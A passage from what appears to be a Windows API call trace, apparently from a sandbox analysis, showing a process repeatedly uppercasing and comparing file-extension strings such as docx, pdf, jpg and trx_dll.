returned 3 [0111.571] CharUpperBuffW (in: lpsz="xls", cchLength=0x3 | out: lpsz="XLS") returned 0x3 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="XLS", cchCount1=3, lpString2="XLS", cchCount2=3) returned 2 [0111.571] CharUpperBuffW (in: lpsz="xls", cchLength=0x3 | out: lpsz="XLS") returned 0x3 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="XLS", cchCount1=3, lpString2="XLS", cchCount2=3) returned 2 [0111.571] CharUpperBuffW (in: lpsz="docx", cchLength=0x4 | out: lpsz="DOCX") returned 0x4 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="DOCX", cchCount1=4, lpString2="XLS", cchCount2=3) returned 1 [0111.571] CharUpperBuffW (in: lpsz="docx", cchLength=0x4 | out: lpsz="DOCX") returned 0x4 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XLS", cchCount1=3, lpString2="DOCX", cchCount2=4) returned 3 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SDF", cchCount1=3, lpString2="DOCX", cchCount2=4) returned 3 [0111.571] CharUpperBuffW (in: lpsz="docx", cchLength=0x4 | out: lpsz="DOCX") returned 0x4 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="DOCX", cchCount1=4, lpString2="DOCX", cchCount2=4) returned 2 [0111.571] CharUpperBuffW (in: lpsz="docx", cchLength=0x4 | out: lpsz="DOCX") returned 0x4 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="DOCX", cchCount1=4, lpString2="DOCX", cchCount2=4) returned 2 [0111.571] CharUpperBuffW (in: lpsz="docx", cchLength=0x4 | out: lpsz="DOCX") returned 0x4 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="DOCX", cchCount1=4, lpString2="DOCX", cchCount2=4) returned 2 [0111.571] CharUpperBuffW (in: lpsz="docx", cchLength=0x4 | out: lpsz="DOCX") returned 0x4 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="DOCX", cchCount1=4, lpString2="DOCX", cchCount2=4) returned 2 [0111.571] CharUpperBuffW (in: lpsz="docx", cchLength=0x4 | out: lpsz="DOCX") returned 0x4 [0111.571] 
CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="DOCX", cchCount1=4, lpString2="DOCX", cchCount2=4) returned 2 [0111.571] CharUpperBuffW (in: lpsz="docx", cchLength=0x4 | out: lpsz="DOCX") returned 0x4 [0111.571] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="DOCX", cchCount1=4, lpString2="DOCX", cchCount2=4) returned 2 [0111.571] CharUpperBuffW (in: lpsz="docx", cchLength=0x4 | out: lpsz="DOCX") returned 0x4 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="DOCX", cchCount1=4, lpString2="DOCX", cchCount2=4) returned 2 [0111.572] CharUpperBuffW (in: lpsz="doc", cchLength=0x3 | out: lpsz="DOC") returned 0x3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="DOC", cchCount1=3, lpString2="DOCX", cchCount2=4) returned 1 [0111.572] CharUpperBuffW (in: lpsz="doc", cchLength=0x3 | out: lpsz="DOC") returned 0x3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SDF", cchCount1=3, lpString2="DOC", cchCount2=3) returned 3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOCX", cchCount1=4, lpString2="DOC", cchCount2=3) returned 3 [0111.572] CharUpperBuffW (in: lpsz="doc", cchLength=0x3 | out: lpsz="DOC") returned 0x3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="DOC", cchCount1=3, lpString2="DOC", cchCount2=3) returned 2 [0111.572] CharUpperBuffW (in: lpsz="doc", cchLength=0x3 | out: lpsz="DOC") returned 0x3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="DOC", cchCount1=3, lpString2="DOC", cchCount2=3) returned 2 [0111.572] CharUpperBuffW (in: lpsz="doc", cchLength=0x3 | out: lpsz="DOC") returned 0x3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="DOC", cchCount1=3, lpString2="DOC", cchCount2=3) returned 2 [0111.572] CharUpperBuffW (in: lpsz="doc", cchLength=0x3 | out: lpsz="DOC") returned 0x3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="DOC", cchCount1=3, lpString2="DOC", cchCount2=3) returned 2 
[0111.572] CharUpperBuffW (in: lpsz="ods", cchLength=0x3 | out: lpsz="ODS") returned 0x3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="ODS", cchCount1=3, lpString2="DOC", cchCount2=3) returned 3 [0111.572] CharUpperBuffW (in: lpsz="ods", cchLength=0x3 | out: lpsz="ODS") returned 0x3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SDF", cchCount1=3, lpString2="ODS", cchCount2=3) returned 3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOC", cchCount1=3, lpString2="ODS", cchCount2=3) returned 1 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOCX", cchCount1=4, lpString2="ODS", cchCount2=3) returned 1 [0111.572] CharUpperBuffW (in: lpsz="ods", cchLength=0x3 | out: lpsz="ODS") returned 0x3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="ODS", cchCount1=3, lpString2="ODS", cchCount2=3) returned 2 [0111.572] CharUpperBuffW (in: lpsz="ods", cchLength=0x3 | out: lpsz="ODS") returned 0x3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="ODS", cchCount1=3, lpString2="ODS", cchCount2=3) returned 2 [0111.572] CharUpperBuffW (in: lpsz="ods", cchLength=0x3 | out: lpsz="ODS") returned 0x3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="ODS", cchCount1=3, lpString2="ODS", cchCount2=3) returned 2 [0111.572] CharUpperBuffW (in: lpsz="ods", cchLength=0x3 | out: lpsz="ODS") returned 0x3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="ODS", cchCount1=3, lpString2="ODS", cchCount2=3) returned 2 [0111.572] CharUpperBuffW (in: lpsz="odt", cchLength=0x3 | out: lpsz="ODT") returned 0x3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="ODT", cchCount1=3, lpString2="ODS", cchCount2=3) returned 3 [0111.572] CharUpperBuffW (in: lpsz="odt", cchLength=0x3 | out: lpsz="ODT") returned 0x3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ODS", cchCount1=3, lpString2="ODT", cchCount2=3) returned 1 
[0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XLS", cchCount1=3, lpString2="ODT", cchCount2=3) returned 3 [0111.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SDF", cchCount1=3, lpString2="ODT", cchCount2=3) returned 3 [0111.572] CharUpperBuffW (in: lpsz="odt", cchLength=0x3 | out: lpsz="ODT") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="ODT", cchCount1=3, lpString2="ODT", cchCount2=3) returned 2 [0111.573] CharUpperBuffW (in: lpsz="odt", cchLength=0x3 | out: lpsz="ODT") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="ODT", cchCount1=3, lpString2="ODT", cchCount2=3) returned 2 [0111.573] CharUpperBuffW (in: lpsz="pdf", cchLength=0x3 | out: lpsz="PDF") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="PDF", cchCount1=3, lpString2="ODT", cchCount2=3) returned 3 [0111.573] CharUpperBuffW (in: lpsz="pdf", cchLength=0x3 | out: lpsz="PDF") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ODT", cchCount1=3, lpString2="PDF", cchCount2=3) returned 1 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XLS", cchCount1=3, lpString2="PDF", cchCount2=3) returned 3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SDF", cchCount1=3, lpString2="PDF", cchCount2=3) returned 3 [0111.573] CharUpperBuffW (in: lpsz="pdf", cchLength=0x3 | out: lpsz="PDF") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="PDF", cchCount1=3, lpString2="PDF", cchCount2=3) returned 2 [0111.573] CharUpperBuffW (in: lpsz="pdf", cchLength=0x3 | out: lpsz="PDF") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="PDF", cchCount1=3, lpString2="PDF", cchCount2=3) returned 2 [0111.573] CharUpperBuffW (in: lpsz="jpg", cchLength=0x3 | out: lpsz="JPG") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="JPG", cchCount1=3, 
lpString2="PDF", cchCount2=3) returned 1 [0111.573] CharUpperBuffW (in: lpsz="jpg", cchLength=0x3 | out: lpsz="JPG") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ODT", cchCount1=3, lpString2="JPG", cchCount2=3) returned 3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOCX", cchCount1=4, lpString2="JPG", cchCount2=3) returned 1 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ODS", cchCount1=3, lpString2="JPG", cchCount2=3) returned 3 [0111.573] CharUpperBuffW (in: lpsz="jpg", cchLength=0x3 | out: lpsz="JPG") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="JPG", cchCount1=3, lpString2="JPG", cchCount2=3) returned 2 [0111.573] CharUpperBuffW (in: lpsz="jpg", cchLength=0x3 | out: lpsz="JPG") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="JPG", cchCount1=3, lpString2="JPG", cchCount2=3) returned 2 [0111.573] CharUpperBuffW (in: lpsz="jpg", cchLength=0x3 | out: lpsz="JPG") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="JPG", cchCount1=3, lpString2="JPG", cchCount2=3) returned 2 [0111.573] CharUpperBuffW (in: lpsz="jpg", cchLength=0x3 | out: lpsz="JPG") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="JPG", cchCount1=3, lpString2="JPG", cchCount2=3) returned 2 [0111.573] CharUpperBuffW (in: lpsz="jpg", cchLength=0x3 | out: lpsz="JPG") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="JPG", cchCount1=3, lpString2="JPG", cchCount2=3) returned 2 [0111.573] CharUpperBuffW (in: lpsz="jpg", cchLength=0x3 | out: lpsz="JPG") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="JPG", cchCount1=3, lpString2="JPG", cchCount2=3) returned 2 [0111.573] CharUpperBuffW (in: lpsz="jpg", cchLength=0x3 | out: lpsz="JPG") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="JPG", cchCount1=3, 
lpString2="JPG", cchCount2=3) returned 2 [0111.573] CharUpperBuffW (in: lpsz="jpg", cchLength=0x3 | out: lpsz="JPG") returned 0x3 [0111.573] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="JPG", cchCount1=3, lpString2="JPG", cchCount2=3) returned 2 [0111.574] CharUpperBuffW (in: lpsz="jpg", cchLength=0x3 | out: lpsz="JPG") returned 0x3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="JPG", cchCount1=3, lpString2="JPG", cchCount2=3) returned 2 [0111.574] CharUpperBuffW (in: lpsz="jpg", cchLength=0x3 | out: lpsz="JPG") returned 0x3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="JPG", cchCount1=3, lpString2="JPG", cchCount2=3) returned 2 [0111.574] CharUpperBuffW (in: lpsz="jpg", cchLength=0x3 | out: lpsz="JPG") returned 0x3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="JPG", cchCount1=3, lpString2="JPG", cchCount2=3) returned 2 [0111.574] CharUpperBuffW (in: lpsz="acrodata", cchLength=0x8 | out: lpsz="ACRODATA") returned 0x8 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="ACRODATA", cchCount1=8, lpString2="JPG", cchCount2=3) returned 1 [0111.574] CharUpperBuffW (in: lpsz="acrodata", cchLength=0x8 | out: lpsz="ACRODATA") returned 0x8 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ODT", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOCX", cchCount1=4, lpString2="ACRODATA", cchCount2=8) returned 3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOC", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0111.574] CharUpperBuffW (in: lpsz="png", cchLength=0x3 | out: lpsz="PNG") returned 0x3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="PNG", cchCount1=3, lpString2="ACRODATA", cchCount2=8) returned 3 [0111.574] CharUpperBuffW (in: lpsz="png", cchLength=0x3 | out: lpsz="PNG") returned 0x3 [0111.574] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="ODS", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SDF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ODT", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PDF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0111.574] CharUpperBuffW (in: lpsz="png", cchLength=0x3 | out: lpsz="PNG") returned 0x3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="PNG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 2 [0111.574] CharUpperBuffW (in: lpsz="png", cchLength=0x3 | out: lpsz="PNG") returned 0x3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="PNG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 2 [0111.574] CharUpperBuffW (in: lpsz="png", cchLength=0x3 | out: lpsz="PNG") returned 0x3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="PNG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 2 [0111.574] CharUpperBuffW (in: lpsz="png", cchLength=0x3 | out: lpsz="PNG") returned 0x3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="PNG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 2 [0111.574] CharUpperBuffW (in: lpsz="png", cchLength=0x3 | out: lpsz="PNG") returned 0x3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="PNG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 2 [0111.574] CharUpperBuffW (in: lpsz="GRL", cchLength=0x3 | out: lpsz="GRL") returned 0x3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="GRL", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0111.574] CharUpperBuffW (in: lpsz="GRL", cchLength=0x3 | out: lpsz="GRL") returned 0x3 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ODT", cchCount1=3, lpString2="GRL", cchCount2=3) returned 3 
[0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOCX", cchCount1=4, lpString2="GRL", cchCount2=3) returned 1 [0111.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JPG", cchCount1=3, lpString2="GRL", cchCount2=3) returned 3 [0111.575] CharUpperBuffW (in: lpsz="GRL", cchLength=0x3 | out: lpsz="GRL") returned 0x3 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="GRL", cchCount1=3, lpString2="GRL", cchCount2=3) returned 2 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="GRL", cchCount2=3) returned 3 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ODS", cchCount1=3, lpString2="TRX_DLL", cchCount2=7) returned 1 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PNG", cchCount1=3, lpString2="TRX_DLL", cchCount2=7) returned 1 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XLS", cchCount1=3, lpString2="TRX_DLL", cchCount2=7) returned 3 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SDF", cchCount1=3, lpString2="TRX_DLL", cchCount2=7) returned 1 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, 
lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") 
returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.575] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", 
cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] 
CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.576] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.576] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] 
CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="TRX_DLL", cchCount1=7, lpString2="TRX_DLL", cchCount2=7) returned 2 [0111.577] CharUpperBuffW (in: lpsz="trx_dll", cchLength=0x7 | out: lpsz="TRX_DLL") returned 0x7 [0111.577] CompareStringW 